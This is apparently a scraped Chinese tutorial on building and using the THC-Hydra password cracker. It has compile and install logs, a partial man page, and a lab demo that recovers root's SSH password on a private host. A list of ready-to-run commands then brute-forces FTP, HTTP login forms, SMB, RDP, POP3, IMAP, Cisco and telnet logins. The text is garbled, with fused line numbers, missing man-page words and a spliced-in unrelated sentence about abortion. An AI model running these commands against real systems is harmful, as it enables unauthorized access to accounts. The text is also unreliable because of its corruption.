-c hydra-teamspeak.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 72 gcc -I. -O3
-c hydra-postgres.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 73 gcc -I. -O3
-c hydra-rsh.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 74 gcc -I. -O3
-c hydra-rlogin.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 75 gcc -I. -O3
-c hydra-oracle-listener.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 76 gcc -I. -O3
-c hydra-svn.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 77 gcc -I. -O3
-c hydra-pcanywhere.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 78 gcc -I. -O3
-c hydra-sip.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 79 gcc -I. -O3
-c hydra-oracle-sid.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 80 gcc -I. -O3
-c hydra-oracle.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 81 gcc -I. -O3
-c hydra-vmauthd.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 82 gcc -I. -O3
-c hydra-firebird.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 83 gcc -I. -O3
-c hydra-afp.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 84 gcc -I. -O3
-c hydra-ncp.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 85 gcc -I. -O3
-c hydra-http-proxy.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 86 gcc -I. -O3
-c hydra-http-form.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 87 gcc -I. -O3
-c hydra-irc.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 88 gcc -I. -O3
-c hydra-rdp.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 89 gcc -I. -O3
-c crc32.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 90 gcc -I. -O3
-c d3des.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 91 gcc -I. -O3
-c bfg.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 92 gcc -I. -O3
-c ntlm.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 93 gcc -I. -O3
-c sasl.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 94 gcc -I. -O3
-c hmacmd5.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 95 gcc -I. -O3
-c hydra-mod.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 96 gcc -I. -O3 -lm
hydra.c hydra-vnc.o hydra-pcnfs.o hydra-rexec.o hydra-nntp.o hydra-socks5.o hydra-telnet.o hydra-cisco.o hydra-http.o hydra-ftp.o hydra-imap.o hydra-pop3.o hydra-smb.o hydra-icq.o hydra-cisco-enable.o hydra-ldap.o hydra-mysql.o hydra-mssql.o hydra-xmpp.o hydra-http-proxy-urlenum.o hydra-snmp.o hydra-cvs.o hydra-smtp.o hydra-smtp-enum.o hydra-sapr3.o hydra-ssh.o hydra-sshkey.o hydra-teamspeak.o hydra-postgres.o hydra-rsh.o hydra-rlogin.o hydra-oracle-listener.o hydra-svn.o hydra-pcanywhere.o hydra-sip.o hydra-oracle-sid.o hydra-oracle.o hydra-vmauthd.o hydra-firebird.o hydra-afp.o hydra-ncp.o hydra-http-proxy.o hydra-http-form.o hydra-irc.o hydra-rdp.o crc32.o d3des.o bfg.o ntlm.o sasl.o hmacmd5.o hydra-mod.o -lm -lssl -lpcre -lpq -lsvn_client-1 -lapr-1 -laprutil-1 -lsvn_subr-1 -lcrypto -L/usr/lib -L/usr/local/lib -L/lib -L/usr/lib -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H 97
98 If men could get pregnant, abortion would be a sacrament 99 100 101 Now type make install102 103 Now type make install104 strip hydra pw-inspector105 echo OK & /dev/null && test -x xhydra && strip xhydra || echo OK & /dev/null106 mkdir -p /usr/local/ 107 cp -f hydra pw-inspector /usr/local/bin && cd /usr/local/bin && chmod 755 hydra pw-inspector108 echo OK & /dev/null && test -x xhydra && cp xhydra /usr/local/bin && cd /usr/local/bin && chmod 755 xhydra || echo OK & /dev/null109 sed -e "s|^INSTALLDIR=.*|INSTALLDIR="/usr/local"|" dpl4hydra.sh & /usr/local/bin/dpl4hydra.sh110 chmod 755 /usr/local/bin/dpl4hydra.sh111 cp -f *.csv /usr/local/etc/112 mkdir -p /usr/local/man/man1113 cp -f hydra.1 xhydra.1 pw-inspector.1 /usr/local/man/man1到这里已经安装完成可以man下hydra的使用方法
1 [root@localhost hydra-7.4.2]# man hydra
2 HYDRA(1)
hydra - a very fast network logon cracker which support many different services
7 SYNOPSIS
[[[-l LOGIN|-L FILE] [-p PASS|-P FILE|-x OPT]] | [-C FILE]] [-e nsr] 10
[-u] [-f] [-F] [-M FILE] [-o FILE] [-t TASKS] [-w TIME] [-W TIME] 11
[-s PORT] [-S] [-4/6] [-vV] [-d] 12
server service [OPTIONAL_SERVICE_PARAMETER] 13
14 DESCRIPTION 15
parallized
cracker which supports numerous protocols to attack. New modules are easy to add, beside that, it is 16
flexible and very fast. 17
This tool gives researchers and security consultants the possiblity to show how easy it would be to
unauthorized
remote to a . 20
Currently this tool supports: 22
auth, Cisco enable, CVS, Firebird, FTP, FTPS, 23
HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, 24
HTTP-PROXY-URLENUM, ICQ, IMAP, IRC, LDAP2, LDAP3, MS-SQL, MYSQL, NCP, NNTP, 25
Oracle, Oracle-Listener, Oracle-SID, PC-Anywhere, PCNFS, POP3, POSTGRES, 26
RDP, REXEC, RLOGIN, RSH, SAP/R3, SIP, SMB, SMTP, SMTP-Enum, SNMP, 27
SOCKS5, SSH(v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, 28
VMware-Auth, VNC and XMPP. 29
For most protocols, SSL mode is available (e.g. https-get, ftp-ssl, etc.) 30
If not all necessary libraries are found during compile time, your 31
available services will be less. Type "hydra" to see what is available. 32
33 Options 34
target a target to attack, can be an IPv4 address,
address or DNS name. 35
service 37
a service to attack, see the list of protocols available 38
OPTIONAL SERVICE PARAMETER 40
Some modules have optional or mandatory options. type "hydra -U &servicename&" 41
to get help> 42
restore a previously aborted session. Requires a hydra.restore file was written. No other options are allowed when using -R
继续从上一次进度接着破解 44
connect via SSL 46
大写，采用SSL链接 47
-s PORT 48
if the service is> 49
-l LOGIN 51
or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS 54
or -P FILE try password PASS, or load several passwords from FILE 55
-x min:max:charset 57
generate passwords from min to max length. charset can contain 1 58
for numbers, a for lowcase and A for upcase characters. 59
Any other character is added is put to the list. 60
Example: 1:2:a1%. 61
The generated passwords will be of length 1 to 2 and contain 62
lowcase letters, numbers and/or percent signs and dots. 63
-e nsr additional checks, "n" for null password, "s" try login as pass, "r" try the reverse login as pass 65
-C FILE 67
colon separated "login:pass" format, instead of -L/-P options 68
default Hydra checks all passwords for> 70
the first password is tried> 71
exit after the first found login/password pair (per host if -M) 73
exit after the first found login/password pair for any host (for usage with -M) 75
-M FILE 77
server list for parallel attacks,> 78
-o FILE 80
write found login/password pairs to FILE instead of stdout 81
-t TASKS 83
run TASKS number of connects in parallel (default: 16) 84
-w TIME 86
defines the max wait time in seconds for responses (default: 32) 87
-w TIME 89
defines a wait time between each connection a task performs. This usually> 90
-4 / -6 93
prefer IPv4 (default) or IPv6 addresses 94
-v / -V 96
verbose mode / show login+pass combination for each attempt -d debug mode 97
-h, --help 99
Show summary of options.100 101 SEE ALSO102
xhydra(1), pw-inspector(1).103
The programs are documented fully by van Hauser &vh@thc.org&104 105 AUTHOR106
hydra was written by van Hauser / THC &vh@thc.org& and is co-maintained by David Maciejak &david.&.107 108
This manual page was written by Daniel Echeverry &&, for the Debian project (and may be used by others).109 110
24/05/2012
HYDRA(1)下面来演示下破解；首先本人只是实验没有真正的去网上下载密码库字典，手动写了两个文件 users.txt和password.txt1 [root@localhost hydra-7.4.2]# cat users.txt 2 root3 [root@localhost hydra-7.4.2]# cat password.txt 4 111...AAA5 111...aaa6 8 DELL2012.9 ddddaaa11不过在运行命令的时候报错了0 0！[root@localhost~]#hydra 192.168.1.253 ssh -l
root -p passwrod.txt[ERROR] Compiled without LIBSSH v0.4.x support, module is not available!　提示没有libssh这个支持真的吗？&[root@localhost ~]#rpm -qa |grep libssh*查看是什么都没有- -！好嘛yum下试试[root@localhost ~]#yum -y install libssh*Loaded plugins: fastestmirror, refresh-packagekitLoading mirror speeds from cached hostfile * base: mirrors.btte.net * extras: mirrors.btte.net * updates: centos.Setting up Install ProcessNo package libssh-0.4.8 available.No package libssh-0.4.8.tar.gz available.Error: Nothing to do呵呵原来没有rpm包只有查看了下网上找下wget http://www.libssh.org/files/0.4/libssh-0.4.8.tar.gz&tar zxvf libssh-0.4.8.tar.gz&cd libssh-0.4.8mkdir buildcd buildcmake -DCMAKE_INSTALL_PREFIX=/usr -DCMAKE_BUILD_TYPE=Debug -DWITH_SSH1=ON ..makemake install 这个可行，不过我cp代码提示错误只好敲了一遍OK可以安装成功！然后重新编译下hydra 进入到解压目录cd ../../hydra-7.4.2/然后执行 make clean 1 然后执行经典三部曲 2 ./configure
3 make && make install 4 安装如无报错跟上文编译提示一样。 5 好了OK现在安装完毕 6 现在执行下试试 7 [root@localhost ~]# hydra 192.168.1.253 ssh -l root -P passwrod.txt
8 Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes> 9 10 Hydra (http://www.thc.org/thc-hydra) starting at
00:14:0011 [DATA] 7 tasks, 1 server, 7 login tries (l:1/p:7), ~1 try per task12 [DATA] attacking service ssh>13 [22][ssh] host: 192.168.1.253
login: root
password: DELL of 1 target successfully completed, 1 valid password found15 Hydra (http://www.thc.org/thc-hydra) finished at
00:14:0216 17 呵呵这里要说明下 password.txt是本人手写的强大的密码库可以去网上下载18 [root@localhost ~]# cat passwrod.txt 19 adsadsa20 sadsaqhjk21
dsads1321323 DELL2012.24 DSADJHK.25 111...AAA26
呵呵我的就这么几个密码数据所有破解起来是比较快的当然上述只是一个实验，想要获取更好的体验效果可以下载更强大的密码库文件！更多的使用五、其他类型密码破解破解ftp：# hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV# hydra ip ftp -l 用户名 -P 密码字典 -e ns -vVget方式提交，破解web登录：　　# hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/　　# hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.post方式提交，破解web登录：　　该软件的强大之处就在于支持多种协议的破解，同样也支持对于web用户界面的登录破解，get方式提交的表单比较简单，这里通过post方式提交密码破解提供思路。该工具有一个不好的地方就是，如果目标登录时候需要就无法破解了。带参数破解如下：&form action="index.php" method="POST"&&input type="text" name="name" /&&BR&&br&&input type="password" name="pwd" /&&br&&br&&input type="submit" name="sub" value="/patf/archive//提交"&&/form&　　假设有以上一个密码登录表单，我们执行命令：# hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form &index.php:name=^USER^&pwd=^PASS^:&title&invalido&/title&&　　说明：破解的用户名是admin，密码字典是pass.lst，破解结果保存在ok.lst，-t 是同时线程数为1，-f 是当破解了一个密码就停止，ip 是本地，就是目标ip，http-post-form表示破解是采用http 的post 方式提交的表单密码破解。　　后面参数是中对应的表单字段的name 属性，后面&title&中的内容是表示错误猜解的返回信息提示，可以自定义。破解https：# hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https破解teamspeak：# hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak破解cisco：# hydra -P pass.txt 10.36.16.18 cisco# hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable破解smb：# hydra -l administrator -P pass.txt 10.36.16.18 smb破解pop3：# hydra -l muts -P pass.txt my.pop3.mail pop3破解rdp：# hydra ip rdp -l administrator -P pass.txt -V破解http-proxy：# hydra -l admin -P pass.txt http-proxy://10.36.16.18破解imap：# hydra -L user.txt -p secret 10.36.16.18 imap PLAIN# hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN破解telnet# hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V}

叫阿莫西中心